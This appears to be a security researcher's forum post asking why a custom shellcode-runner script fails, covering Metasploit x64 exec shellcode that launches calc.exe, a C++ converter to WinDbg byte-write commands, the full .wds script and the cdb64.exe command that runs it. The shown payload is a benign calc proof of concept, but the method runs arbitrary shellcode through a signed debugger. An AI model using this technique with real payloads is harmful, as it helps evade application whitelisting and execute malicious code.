test
test copied to clipboard
Published
20 hours ago •
3gstudent
3gstudent
Question about shellcode
http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
My way:
1.First, use msfpayload to generate a shellcode.
use windows/x64/exec
set cmd calc.exe
generate -t hex
Generate the following shellcode:
fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d08b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e957ffffff5d48ba0100000000000000488d8d0101000041ba318b6f87ffd5bbf0b5a25641baa695bd9dffd54883c4283c067c0a80fbe07505bb4713726f6a00594189daffd563616c632e65786500
2.Change the shellcode's format.
I write a c++ program to achieve it
Code is:
#include "stdafx.h"
#include <string.h>
char *buf="fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d08b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e957ffffff5d48ba0100000000000000488d8d0101000041ba318b6f87ffd5bbf0b5a25641baa695bd9dffd54883c4283c067c0a80fbe07505bb4713726f6a00594189daffd563616c632e65786500";
int main(int argc, char* argv[])
{
for(int i=0;i<strlen(buf)/2;i++)
{
printf(";eb @$t0+%02X %C%C",i,buf[i*2],buf[i*2+1]);
if((i+1)%4==0)
printf("\n");
}
printf("\n");
return 0;
}
Here is the output:
3.Modify the file x64_calc.wds
- Replace the shellcode
- Reset the size of shellcode buffer
Here is my test.wds:
.foreach /pS 5 ( register { .dvalloc 276 } ) { r @$t0 = register }
;eb @$t0+00 fc;eb @$t0+01 48;eb @$t0+02 83;eb @$t0+03 e4
;eb @$t0+04 f0;eb @$t0+05 e8;eb @$t0+06 c0;eb @$t0+07 00
;eb @$t0+08 00;eb @$t0+09 00;eb @$t0+0A 41;eb @$t0+0B 51
;eb @$t0+0C 41;eb @$t0+0D 50;eb @$t0+0E 52;eb @$t0+0F 51
;eb @$t0+10 56;eb @$t0+11 48;eb @$t0+12 31;eb @$t0+13 d2
;eb @$t0+14 65;eb @$t0+15 48;eb @$t0+16 8b;eb @$t0+17 52
;eb @$t0+18 60;eb @$t0+19 48;eb @$t0+1A 8b;eb @$t0+1B 52
;eb @$t0+1C 18;eb @$t0+1D 48;eb @$t0+1E 8b;eb @$t0+1F 52
;eb @$t0+20 20;eb @$t0+21 48;eb @$t0+22 8b;eb @$t0+23 72
;eb @$t0+24 50;eb @$t0+25 48;eb @$t0+26 0f;eb @$t0+27 b7
;eb @$t0+28 4a;eb @$t0+29 4a;eb @$t0+2A 4d;eb @$t0+2B 31
;eb @$t0+2C c9;eb @$t0+2D 48;eb @$t0+2E 31;eb @$t0+2F c0
;eb @$t0+30 ac;eb @$t0+31 3c;eb @$t0+32 61;eb @$t0+33 7c
;eb @$t0+34 02;eb @$t0+35 2c;eb @$t0+36 20;eb @$t0+37 41
;eb @$t0+38 c1;eb @$t0+39 c9;eb @$t0+3A 0d;eb @$t0+3B 41
;eb @$t0+3C 01;eb @$t0+3D c1;eb @$t0+3E e2;eb @$t0+3F ed
;eb @$t0+40 52;eb @$t0+41 41;eb @$t0+42 51;eb @$t0+43 48
;eb @$t0+44 8b;eb @$t0+45 52;eb @$t0+46 20;eb @$t0+47 8b
;eb @$t0+48 42;eb @$t0+49 3c;eb @$t0+4A 48;eb @$t0+4B 01
;eb @$t0+4C d0;eb @$t0+4D 8b;eb @$t0+4E 80;eb @$t0+4F 88
;eb @$t0+50 00;eb @$t0+51 00;eb @$t0+52 00;eb @$t0+53 48
;eb @$t0+54 85;eb @$t0+55 c0;eb @$t0+56 74;eb @$t0+57 67
;eb @$t0+58 48;eb @$t0+59 01;eb @$t0+5A d0;eb @$t0+5B 50
;eb @$t0+5C 8b;eb @$t0+5D 48;eb @$t0+5E 18;eb @$t0+5F 44
;eb @$t0+60 8b;eb @$t0+61 40;eb @$t0+62 20;eb @$t0+63 49
;eb @$t0+64 01;eb @$t0+65 d0;eb @$t0+66 e3;eb @$t0+67 56
;eb @$t0+68 48;eb @$t0+69 ff;eb @$t0+6A c9;eb @$t0+6B 41
;eb @$t0+6C 8b;eb @$t0+6D 34;eb @$t0+6E 88;eb @$t0+6F 48
;eb @$t0+70 01;eb @$t0+71 d6;eb @$t0+72 4d;eb @$t0+73 31
;eb @$t0+74 c9;eb @$t0+75 48;eb @$t0+76 31;eb @$t0+77 c0
;eb @$t0+78 ac;eb @$t0+79 41;eb @$t0+7A c1;eb @$t0+7B c9
;eb @$t0+7C 0d;eb @$t0+7D 41;eb @$t0+7E 01;eb @$t0+7F c1
;eb @$t0+80 38;eb @$t0+81 e0;eb @$t0+82 75;eb @$t0+83 f1
;eb @$t0+84 4c;eb @$t0+85 03;eb @$t0+86 4c;eb @$t0+87 24
;eb @$t0+88 08;eb @$t0+89 45;eb @$t0+8A 39;eb @$t0+8B d1
;eb @$t0+8C 75;eb @$t0+8D d8;eb @$t0+8E 58;eb @$t0+8F 44
;eb @$t0+90 8b;eb @$t0+91 40;eb @$t0+92 24;eb @$t0+93 49
;eb @$t0+94 01;eb @$t0+95 d0;eb @$t0+96 66;eb @$t0+97 41
;eb @$t0+98 8b;eb @$t0+99 0c;eb @$t0+9A 48;eb @$t0+9B 44
;eb @$t0+9C 8b;eb @$t0+9D 40;eb @$t0+9E 1c;eb @$t0+9F 49
;eb @$t0+A0 01;eb @$t0+A1 d0;eb @$t0+A2 41;eb @$t0+A3 8b
;eb @$t0+A4 04;eb @$t0+A5 88;eb @$t0+A6 48;eb @$t0+A7 01
;eb @$t0+A8 d0;eb @$t0+A9 41;eb @$t0+AA 58;eb @$t0+AB 41
;eb @$t0+AC 58;eb @$t0+AD 5e;eb @$t0+AE 59;eb @$t0+AF 5a
;eb @$t0+B0 41;eb @$t0+B1 58;eb @$t0+B2 41;eb @$t0+B3 59
;eb @$t0+B4 41;eb @$t0+B5 5a;eb @$t0+B6 48;eb @$t0+B7 83
;eb @$t0+B8 ec;eb @$t0+B9 20;eb @$t0+BA 41;eb @$t0+BB 52
;eb @$t0+BC ff;eb @$t0+BD e0;eb @$t0+BE 58;eb @$t0+BF 41
;eb @$t0+C0 59;eb @$t0+C1 5a;eb @$t0+C2 48;eb @$t0+C3 8b
;eb @$t0+C4 12;eb @$t0+C5 e9;eb @$t0+C6 57;eb @$t0+C7 ff
;eb @$t0+C8 ff;eb @$t0+C9 ff;eb @$t0+CA 5d;eb @$t0+CB 48
;eb @$t0+CC ba;eb @$t0+CD 01;eb @$t0+CE 00;eb @$t0+CF 00
;eb @$t0+D0 00;eb @$t0+D1 00;eb @$t0+D2 00;eb @$t0+D3 00
;eb @$t0+D4 00;eb @$t0+D5 48;eb @$t0+D6 8d;eb @$t0+D7 8d
;eb @$t0+D8 01;eb @$t0+D9 01;eb @$t0+DA 00;eb @$t0+DB 00
;eb @$t0+DC 41;eb @$t0+DD ba;eb @$t0+DE 31;eb @$t0+DF 8b
;eb @$t0+E0 6f;eb @$t0+E1 87;eb @$t0+E2 ff;eb @$t0+E3 d5
;eb @$t0+E4 bb;eb @$t0+E5 f0;eb @$t0+E6 b5;eb @$t0+E7 a2
;eb @$t0+E8 56;eb @$t0+E9 41;eb @$t0+EA ba;eb @$t0+EB a6
;eb @$t0+EC 95;eb @$t0+ED bd;eb @$t0+EE 9d;eb @$t0+EF ff
;eb @$t0+F0 d5;eb @$t0+F1 48;eb @$t0+F2 83;eb @$t0+F3 c4
;eb @$t0+F4 28;eb @$t0+F5 3c;eb @$t0+F6 06;eb @$t0+F7 7c
;eb @$t0+F8 0a;eb @$t0+F9 80;eb @$t0+FA fb;eb @$t0+FB e0
;eb @$t0+FC 75;eb @$t0+FD 05;eb @$t0+FE bb;eb @$t0+FF 47
;eb @$t0+100 13;eb @$t0+101 72;eb @$t0+102 6f;eb @$t0+103 6a
;eb @$t0+104 00;eb @$t0+105 59;eb @$t0+106 41;eb @$t0+107 89
;eb @$t0+108 da;eb @$t0+109 ff;eb @$t0+10A d5;eb @$t0+10B 63
;eb @$t0+10C 61;eb @$t0+10D 6c;eb @$t0+10E 63;eb @$t0+10F 2e
;eb @$t0+110 65;eb @$t0+111 78;eb @$t0+112 65;eb @$t0+113 00
r @$ip=@$t0
g
g
q
4.use cdb.exe to run shellcode
TestOS:
Win 10 x64
Command:
cdb64.exe -cf test.wds -o notepad.exe
The POC x64_calc.wds is OK.
But my test.wds failed. Output is:
My Question:
1.Should I change the msfpayload's shellcode or the format?
2.How to set a breakpoint on my shellcode?
Use cdb.exe?
